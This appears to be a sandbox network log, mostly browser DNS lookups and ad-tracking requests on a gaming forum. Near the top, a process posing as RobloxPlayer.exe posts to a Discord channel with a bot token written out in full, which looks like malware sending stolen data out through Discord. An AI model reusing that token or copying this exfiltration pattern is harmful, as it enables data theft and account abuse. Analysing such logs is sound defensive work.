set-cookie: __dcfduid=95484f5e1b0411efab71860023422a30; Expires=Fri, 25-May-2029 02:06:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1716689197.884
x-ratelimit-reset-after: 1.000
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HwB5kUV5FaSZB9xuX0erIU%2F62EJxf2d9tgkIbo3M6CJTzbOgb1qom4%2FCGkW82NKxR5rCHkZUNKMkRAeQ%2BvF5zNgpO9xT1KYK5mdH%2Fnqi81v1U9eIkzoTKOgIIZkb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=95484f5e1b0411efab71860023422a30f85a506ea8a1d4ecd79f1ed4ac1a91927b5644183e124c7c2dc5a888501c4489; Expires=Fri, 25-May-2029 02:06:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=eda64d725a38acfb775a362105b6e6fa566d5e90-1716689197; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=tSFO9SvEVtgGN5QiHlo9yDcFqlwFin3vYUGqbs.MEYs-1716689197070-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34f60820dc93-LHR
POST

https://discord.com/api/v9/channels/1244109081116151869/messages

RobloxPlayer.exe

Remote address:

162.159.137.232:443

Request

POST /api/v9/channels/1244109081116151869/messages HTTP/1.1
authorization: Bot MTIxNTQyMjc0OTk4ODg4NDU3Mg.G8QiY3.e2k047pCmhPxBH-tdaOfxVTB1BY3dSfZIT_sXY
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 31
Expect: 100-continue

Response

HTTP/1.1 200 OK

Date: Sun, 26 May 2024 02:06:37 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: keep-alive
set-cookie: __dcfduid=95c6fc5a1b0411efb604f284d85ef0ac; Expires=Fri, 25-May-2029 02:06:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3df15bae86f6647dd4dfcbd5c6949480
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1716689198.883
x-ratelimit-reset-after: 1.087
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tZ5jHgecK7W6MNl3WHGj1YHpyYduyIApc1VC%2Bkn8tO5XKr2zPDXCCf%2BEgUW7OXhiICRLLwHUcgDG0L3fn4MGPUBT40re43HqMOqRH2zZY1frd5WFQzEfOuz2rRj1"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=95c6fc5a1b0411efb604f284d85ef0ac18d1451d5bc52aa21941d6871c7652ed58155ad3081487e7edc014e144bc808c; Expires=Fri, 25-May-2029 02:06:37 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=eda64d725a38acfb775a362105b6e6fa566d5e90-1716689197; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=eZ.IXYdDJINRlZvqKaLuTrAtVKLsNQ9uC3ed3NqHeX0-1716689197888-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 889a34fd1dd8889d-LHR
DNS

7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com

firefox.exe

Remote address:

8.8.8.8:53

Request

7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com

IN A

Response

7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com

IN CNAME

pagead-googlehosted.l.google.com

pagead-googlehosted.l.google.com

IN A

172.217.169.65
DNS

pagead-googlehosted.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

pagead-googlehosted.l.google.com

IN A

Response

pagead-googlehosted.l.google.com

IN A

172.217.169.65
GET

https://7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com/safeframe/1-0-40/html/container.html

firefox.exe

Remote address:

172.217.169.65:443

Request

GET /safeframe/1-0-40/html/container.html HTTP/2.0
host: 7c1705369e9085d43a904f2dc1b7756e.safeframe.googlesyndication.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers
DNS

pagead-googlehosted.l.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

pagead-googlehosted.l.google.com

IN AAAA

Response

pagead-googlehosted.l.google.com

IN AAAA

2a00:1450:4009:819::2001
DNS

65.169.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

65.169.217.172.in-addr.arpa

IN PTR

Response

65.169.217.172.in-addr.arpa

IN PTR

lhr48s09-in-f11e100net
DNS

226.179.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

226.179.250.142.in-addr.arpa

IN PTR

Response

226.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f21e100net
DNS

s2s.t13.io

firefox.exe

Remote address:

8.8.8.8:53

Request

s2s.t13.io

IN A

Response

s2s.t13.io

IN A

34.107.140.113
DNS

s2s.t13.io

firefox.exe

Remote address:

8.8.8.8:53

Request

s2s.t13.io

IN A

Response

s2s.t13.io

IN A

34.107.140.113
DNS

s2s.t13.io

firefox.exe

Remote address:

8.8.8.8:53

Request

s2s.t13.io

IN AAAA

Response
DNS

prebid.media.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prebid.media.net

IN A

Response

prebid.media.net

IN A

34.120.63.153
DNS

ib.adnxs.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ib.adnxs.com

IN A

Response

ib.adnxs.com

IN CNAME

xandr-g-geo.trafficmanager.net

xandr-g-geo.trafficmanager.net

IN CNAME

ib.anycast.adnxs.com

ib.anycast.adnxs.com

IN A

185.89.210.90

ib.anycast.adnxs.com

IN A

185.89.210.46

ib.anycast.adnxs.com

IN A

185.89.210.82

ib.anycast.adnxs.com

IN A

185.89.211.116

ib.anycast.adnxs.com

IN A

185.89.210.141

ib.anycast.adnxs.com

IN A

185.89.210.180

ib.anycast.adnxs.com

IN A

185.89.210.122

ib.anycast.adnxs.com

IN A

185.89.210.153

ib.anycast.adnxs.com

IN A

185.89.211.84

ib.anycast.adnxs.com

IN A

185.89.210.212

ib.anycast.adnxs.com

IN A

185.89.210.20

ib.anycast.adnxs.com

IN A

185.89.210.244
DNS

prebid.media.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prebid.media.net

IN A

Response

prebid.media.net

IN A

34.120.63.153
DNS

bidder.criteo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

bidder.criteo.com

IN A

Response

bidder.criteo.com

IN CNAME

bidder.nl3.vip.prod.criteo.com

bidder.nl3.vip.prod.criteo.com

IN A

178.250.1.8
DNS

ib.anycast.adnxs.com

firefox.exe

Remote address:

8.8.8.8:53

Request

ib.anycast.adnxs.com

IN AAAA

Response
DNS

prebid.media.net

firefox.exe

Remote address:

8.8.8.8:53

Request

prebid.media.net

IN AAAA

Response
DNS

bidder.nl3.vip.prod.criteo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

bidder.nl3.vip.prod.criteo.com

IN A

Response

bidder.nl3.vip.prod.criteo.com

IN A

178.250.1.8
DNS

bidder.nl3.vip.prod.criteo.com

firefox.exe

Remote address:

8.8.8.8:53

Request

bidder.nl3.vip.prod.criteo.com

IN AAAA

Response
DNS

tpc.googlesyndication.com

firefox.exe

Remote address:

8.8.8.8:53

Request

tpc.googlesyndication.com

IN A

Response

tpc.googlesyndication.com

IN A

172.217.16.225
DNS

tpc.googlesyndication.com

firefox.exe

Remote address:

8.8.8.8:53

Request

tpc.googlesyndication.com

IN AAAA

Response

tpc.googlesyndication.com

IN AAAA

2a00:1450:4009:821::2001
POST

https://id5-sync.com/g/v2/882.json

firefox.exe

Remote address:

162.19.138.83:443

Request

POST /g/v2/882.json HTTP/2.0
host: id5-sync.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain;charset=UTF-8
content-length: 2028
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

date: Sun, 26 May 2024 02:06:42 GMT
p3p: CP="CAO PSA OUR"
set-cookie: 3pi=; Path=/; Domain=id5-sync.com; Expires=Thu, 01 Jan 1970 00:00:00 GMT; Max-Age=0; SameSite=None; Secure
expires: Thu, 01 Jan 1970 00:00:00 GMT
set-cookie: id5=4fa3668a-fdf4-7fd7-8994-0f2e6bb53509#1716689202158#1; Path=/; Domain=id5-sync.com; Expires=Sat, 24 Aug 2024 02:06:42 GMT; Max-Age=7776000; SameSite=None; Secure
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
access-control-allow-credentials: true
content-type: application/json
strict-transport-security: max-age=63072000; includeSubDomains; preload
POST

https://s2s.t13.io/cookie_sync

firefox.exe

Remote address:

34.107.140.113:443

Request

POST /cookie_sync HTTP/2.0
host: s2s.t13.io
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 1780
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
POST

https://s2s.t13.io/openrtb2/auction

firefox.exe

Remote address:

34.107.140.113:443

Request

POST /openrtb2/auction HTTP/2.0
host: s2s.t13.io
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 4327
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
POST

https://prebid.media.net/rtb/prebid?cid=8CUJ8GUQF

firefox.exe

Remote address:

34.120.63.153:443

Request

POST /rtb/prebid?cid=8CUJ8GUQF HTTP/2.0
host: prebid.media.net
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 5819
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
POST

https://bidder.criteo.com/cdb?profileId=207&av=36&wv=8.40.2&cb=92814424168&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ

firefox.exe

Remote address:

178.250.1.8:443

Request

POST /cdb?profileId=207&av=36&wv=8.40.2&cb=92814424168&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ HTTP/2.0
host: bidder.criteo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 7469
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 204

date: Sun, 26 May 2024 02:06:42 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=31536000; preload;
POST

https://bidder.criteo.com/cdb?profileId=207&av=36&wv=8.40.2&cb=76991966651&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ

firefox.exe

Remote address:

178.250.1.8:443

Request

POST /cdb?profileId=207&av=36&wv=8.40.2&cb=76991966651&lsavail=1&bundle=zuHKE19aNWVsZnRDU3NBRUtFYUVRdmZTYjAyNlVxOUVSb0h0b2JGZ0FhUjc0SmttSW1OS0g1TGZWWG9pS3lLcFY3T0xzOFAlMkJ5T0l4VGFkVERpRTBFSWx1QWZId2lFeElGQnh1YmJLeHVHN3cxeFdvU0d1bWRZdmdGOXZYejc4YXZQNUxJ HTTP/2.0
host: bidder.criteo.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
content-type: text/plain
content-length: 7596
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 204

date: Sun, 26 May 2024 02:06:44 GMT
server: Kestrel
access-control-allow-credentials: true
access-control-allow-origin: https://www.se7ensins.com
vary: Origin
cross-origin-resource-policy: cross-origin
strict-transport-security: max-age=31536000; preload;
DNS

113.140.107.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

113.140.107.34.in-addr.arpa

IN PTR

Response

113.140.107.34.in-addr.arpa

IN PTR

11314010734bcgoogleusercontentcom
DNS

153.63.120.34.in-addr.arpa

Remote address:

8.8.8.8:53

Request

153.63.120.34.in-addr.arpa

IN PTR

Response

153.63.120.34.in-addr.arpa

IN PTR

1536312034bcgoogleusercontentcom
DNS

8.1.250.178.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.1.250.178.in-addr.arpa

IN PTR

Response
DNS

90.210.89.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

90.210.89.185.in-addr.arpa

IN PTR

Response

90.210.89.185.in-addr.arpa

IN PTR

941bm-nginx-loadbalancermgmtams3adnexusnet
GET

https://tpc.googlesyndication.com/sodar/sodar2.js

firefox.exe

Remote address:

172.217.16.225:443

Request

GET /sodar/sodar2.js HTTP/2.0
host: tpc.googlesyndication.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers
DNS

resources.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

resources.infolinks.com

IN A

Response

resources.infolinks.com

IN A

172.66.42.247

resources.infolinks.com

IN A

172.66.41.9
DNS

cdn.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.browsiprod.com

IN A

Response

cdn.browsiprod.com

IN A

3.162.140.5

cdn.browsiprod.com

IN A

3.162.140.38

cdn.browsiprod.com

IN A

3.162.140.49

cdn.browsiprod.com

IN A

3.162.140.29
DNS

resources.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

resources.infolinks.com

IN A

Response

resources.infolinks.com

IN A

172.66.42.247

resources.infolinks.com

IN A

172.66.41.9
DNS

cdn.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.browsiprod.com

IN A

Response

cdn.browsiprod.com

IN A

3.162.140.5

cdn.browsiprod.com

IN A

3.162.140.38

cdn.browsiprod.com

IN A

3.162.140.49

cdn.browsiprod.com

IN A

3.162.140.29
DNS

resources.infolinks.com

firefox.exe

Remote address:

8.8.8.8:53

Request

resources.infolinks.com

IN AAAA

Response
DNS

cdn.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

cdn.browsiprod.com

IN AAAA

Response
DNS

225.16.217.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

225.16.217.172.in-addr.arpa

IN PTR

Response

225.16.217.172.in-addr.arpa

IN PTR

lhr48s28-in-f11e100net

225.16.217.172.in-addr.arpa

IN PTR

mad08s04-in-f1�H
GET

https://www.google.com/recaptcha/api2/aframe

firefox.exe

Remote address:

142.250.187.196:443

Request

GET /recaptcha/api2/aframe HTTP/2.0
host: www.google.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
referer: https://www.se7ensins.com/
upgrade-insecure-requests: 1
sec-fetch-dest: iframe
sec-fetch-mode: navigate
sec-fetch-site: cross-site
te: trailers
DNS

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

firefox.exe

Remote address:

8.8.8.8:53

Request

ats-eks.eu-central-1.dcs-online-targeting-prd.aws.oath.cloud

IN AAAA

Response
GET

https://cdn.browsiprod.com/bootstrap/bootstrap.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /bootstrap/bootstrap.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/javascript
last-modified: Mon, 20 May 2024 12:13:31 GMT
x-amz-server-side-encryption: AES256
x-amz-version-id: EUVgtVYEB5BU3Cl9mKuIZVQE2YKGaojl
server: AmazonS3
content-encoding: gzip
date: Sun, 26 May 2024 01:33:56 GMT
cache-control: public,max-age=3600
etag: W/"3659fb79310edaa2c76e9b0e906d52f7"
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 d7b57c03966322aaa7563ac66201d474.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: 5y1bXug8j5X_oxxpRKEF31P3wReaPOPvvmfi0mu0j7OWV47JM1-rkQ==
age: 1969
vary: Origin
GET

https://cdn.browsiprod.com/generic-templates/freestar/0.1/template.js

firefox.exe

Remote address:

3.162.140.5:443

Request

GET /generic-templates/freestar/0.1/template.js HTTP/2.0
host: cdn.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
sec-fetch-dest: script
sec-fetch-mode: no-cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: text/javascript
date: Mon, 29 Jan 2024 10:35:52 GMT
last-modified: Mon, 04 Sep 2023 06:42:06 GMT
etag: W/"d1c8e1c63ee9cd938226d57d278ad667"
x-amz-server-side-encryption: AES256
cache-control: max-age=31536000
x-amz-version-id: K_8cyH.lJQLcI2sZzyr9AUFZLXxIN0SG
server: AmazonS3
content-encoding: gzip
vary: Accept-Encoding
x-cache: Hit from cloudfront
via: 1.1 d7b57c03966322aaa7563ac66201d474.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: VRbvREid77jigrQkdSg907eMM98HArVQjbmdrZN-s88SMrSwJm9F4Q==
age: 10164663
vary: Origin
DNS

events.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

events.browsiprod.com

IN A

Response

events.browsiprod.com

IN A

52.89.16.229

events.browsiprod.com

IN A

44.228.230.119

events.browsiprod.com

IN A

44.237.6.87

events.browsiprod.com

IN A

35.166.89.22

events.browsiprod.com

IN A

52.26.112.13

events.browsiprod.com

IN A

44.238.197.96
DNS

events.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

events.browsiprod.com

IN A

Response

events.browsiprod.com

IN A

44.238.197.96

events.browsiprod.com

IN A

52.89.16.229

events.browsiprod.com

IN A

52.26.112.13

events.browsiprod.com

IN A

44.228.230.119

events.browsiprod.com

IN A

35.166.89.22

events.browsiprod.com

IN A

44.237.6.87
DNS

yield-manager.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

yield-manager.browsiprod.com

IN A

Response

yield-manager.browsiprod.com

IN A

3.162.140.33

yield-manager.browsiprod.com

IN A

3.162.140.99

yield-manager.browsiprod.com

IN A

3.162.140.24

yield-manager.browsiprod.com

IN A

3.162.140.41
DNS

5.140.162.3.in-addr.arpa

Remote address:

8.8.8.8:53

Request

5.140.162.3.in-addr.arpa

IN PTR

Response

5.140.162.3.in-addr.arpa

IN PTR

server-3-162-140-5dub56r cloudfrontnet
DNS

247.42.66.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

247.42.66.172.in-addr.arpa

IN PTR

Response
DNS

events.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

events.browsiprod.com

IN AAAA

Response
DNS

yield-manager.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

yield-manager.browsiprod.com

IN A

Response

yield-manager.browsiprod.com

IN A

3.162.140.24

yield-manager.browsiprod.com

IN A

3.162.140.41

yield-manager.browsiprod.com

IN A

3.162.140.99

yield-manager.browsiprod.com

IN A

3.162.140.33
DNS

yield-manager.browsiprod.com

firefox.exe

Remote address:

8.8.8.8:53

Request

yield-manager.browsiprod.com

IN AAAA

Response
DNS

pixel.rubiconproject.com

firefox.exe

Remote address:

8.8.8.8:53

Request

pixel.rubiconproject.com

IN A

Response

pixel.rubiconproject.com

IN CNAME

pixel.rubiconproject.net.akadns.net

pixel.rubiconproject.net.akadns.net

IN A

69.173.156.148

pixel.rubiconproject.net.akadns.net

IN A

69.173.156.149
DNS

pixel.rubiconproject.net.akadns.net

firefox.exe

Remote address:

8.8.8.8:53

Request

pixel.rubiconproject.net.akadns.net

IN AAAA

Response
DNS

chromewebstore.googleapis.com

Remote address:

8.8.8.8:53

Request

chromewebstore.googleapis.com

IN A

Response

chromewebstore.googleapis.com

IN A

216.58.201.106

chromewebstore.googleapis.com

IN A

216.58.204.74

chromewebstore.googleapis.com

IN A

216.58.212.202

chromewebstore.googleapis.com

IN A

172.217.169.42

chromewebstore.googleapis.com

IN A

142.250.179.234

chromewebstore.googleapis.com

IN A

142.250.180.10

chromewebstore.googleapis.com

IN A

142.250.187.202

chromewebstore.googleapis.com

IN A

142.250.187.234

chromewebstore.googleapis.com

IN A

142.250.178.10

chromewebstore.googleapis.com

IN A

172.217.16.234

chromewebstore.googleapis.com

IN A

142.250.200.10

chromewebstore.googleapis.com

IN A

142.250.200.42
DNS

chromewebstore.googleapis.com

Remote address:

8.8.8.8:53

Request

chromewebstore.googleapis.com

IN Unknown

Response
DNS

106.201.58.216.in-addr.arpa

Remote address:

8.8.8.8:53

Request

106.201.58.216.in-addr.arpa

IN PTR

Response

106.201.58.216.in-addr.arpa

IN PTR

lhr48s48-in-f101e100net

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f10�I

106.201.58.216.in-addr.arpa

IN PTR

prg03s02-in-f106�I
DNS

229.16.89.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

229.16.89.52.in-addr.arpa

IN PTR

Response

229.16.89.52.in-addr.arpa

IN PTR

ec2-52-89-16-229 us-west-2compute amazonawscom
GET

https://yield-manager.browsiprod.com/supply/v5?sk=d_mapping&pk=freestar&url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&bid=QRVKjwVVQoClbUOr%40uoq&at=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&sw=1280&sh=720&r=https%3A%2F%2Fwww.google.com%2F

firefox.exe

Remote address:

3.162.140.33:443

Request

GET /supply/v5?sk=d_mapping&pk=freestar&url=https%3A%2F%2Fwww.se7ensins.com%2Fforums%2Fthreads%2Fhow-to-tell-if-youve-been-ratted.470346%2F&bid=QRVKjwVVQoClbUOr%40uoq&at=How%20to%20tell%20if%20you%27ve%20been%20ratted%20%7C%20Se7enSins%20Gaming%20Community&sw=1280&sh=720&r=https%3A%2F%2Fwww.google.com%2F HTTP/2.0
host: yield-manager.browsiprod.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
accept: */*
accept-language: en-US,en;q=0.5
accept-encoding: gzip, deflate, br
origin: https://www.se7ensins.com
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: cross-site
referer: https://www.se7ensins.com/
te: trailers

Response

HTTP/2.0 200

content-type: application/json
date: Sun, 26 May 2024 02:06:45 GMT
content-encoding: gzip
access-control-allow-origin: https://www.se7ensins.com
access-control-allow-credentials: true
server: akka-http/10.2.1
x-cache: Miss from cloudfront
via: 1.1 1a6dae3e64a702be248e9bf62b719afc.cloudfront.net (CloudFront)
x-amz-cf-pop: DUB56-P2
x-amz-cf-id: mRNlVGym-htGY-45UjCVB_lJt70zqsCdCjtN4mdR170a1Jwlrfd3MA==
GET

https://pixel.rubiconproject.com/exchange/sync.php?p=pbs-triple13&gdpr=1&gdpr_consent=CP_ONMAP_ONMAAKA1AENDgCsAP_AAEPAACiQg1NX_H__bW9r8X7_aft0eY1P9_j77sQxBhfJE-4F3LvW_JwXx2E5NF36tqoKmRoEu3ZBIUNlHJHUTVmwaogVryHsakWcoTNKJ6BkkFMRM2dYCF5vm4tjeQKY5_p_d3fx2D-t_dv839zzz8VHn3e5fue0-PCdU5-9Dfn9fRfb-9IP9_78v8v8_l_rk2_eT13_pcvr_D--f_87_XW-9_cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEQagCzDQuIAuyJCQm0DCKBACIKwgIoEAAAAJA0QEALgwKdgYBLrCRACBFAAcEAIQAUZAAgAAEgAQiACQIoEAAEAgEAAIAEAgEADAwADgAtBAIAAQHQMUwoAFAsIEiMiIUwIQoEggJbKBBKCoQVwgCLDAigERsFAAgCQEVgACAsXgMASAlYkECXUG0AABAAgFFKFQik_MAQ4Jmy1V4om0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA